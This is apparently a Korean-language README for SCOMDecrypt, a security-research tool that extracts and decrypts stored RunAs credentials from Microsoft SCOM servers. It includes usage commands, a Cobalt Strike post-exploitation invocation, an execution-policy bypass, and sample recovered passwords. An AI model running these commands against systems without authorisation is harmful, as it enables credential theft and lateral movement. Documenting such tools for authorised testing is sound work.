
SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers
NCC Group Plc가 오픈소스로 배포 - http://www.nccgroup.trust/
개발자: Richard Warren, richard [dot] warren [at] nccgroup [dot] trust
http://www.github.com/nccgroup/SCOMDecrypt
AGPL에 따라 배포되며, 자세한 정보는 LICENSE를 참조하십시오
이 도구는 Microsoft System Center Operations Manager(SCOM) 데이터베이스에 저장된 RunAs 자격 증명을 검색하고 복호화하도록 설계되었습니다.
배경 정보는 NCC Group 블로그 게시물 여기를 참조하십시오
이 도구를 실행하려면 SCOM 서버에 대한 관리자 권한이 필요합니다. 또한 다음 레지스트리 키에 대한 읽기 권한이 있는지 확인해야 합니다:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins
다음 키에서 연결 정보를 수집하여 데이터베이스가 표시되는지 수동으로 확인할 수 있습니다:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName
이 도구는 두 가지 형식으로 제공됩니다. 첫 번째는 다음과 같이 인수 없이 SCOM 서버에서 간단히 실행할 수 있는 C# 바이너리입니다:
.\SCOMDecrypt.exe
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
이 도구의 PowerShell 버전도 있습니다. 이는 Cobalt Strike 또는 Empire와 같은 도구와 함께 사용할 때 포스트 익스플로잇 시나리오에서 유용합니다. Cobalt Strike에서 도구를 사용하려면:
powershell-import C:\path\to\SCOMDecrypt.ps1
powershell Invoke-SCOMDecrypt
[+] <SCXUser><UserId>bob</UserId><Elev>sudo</Elev></SCXUser>:H a c k T h e P l a n e t
[+] administrator:W i n t e r 2 0 1 5 !
[+] alice:P a s s w 0 r d 1 2 3 !
PowerShell 콘솔에서 실행하려면:
powershell.exe -exec bypass
. .\Invoke-SCOMDecrypt.ps1
Invoke-SCOMDecrypt
...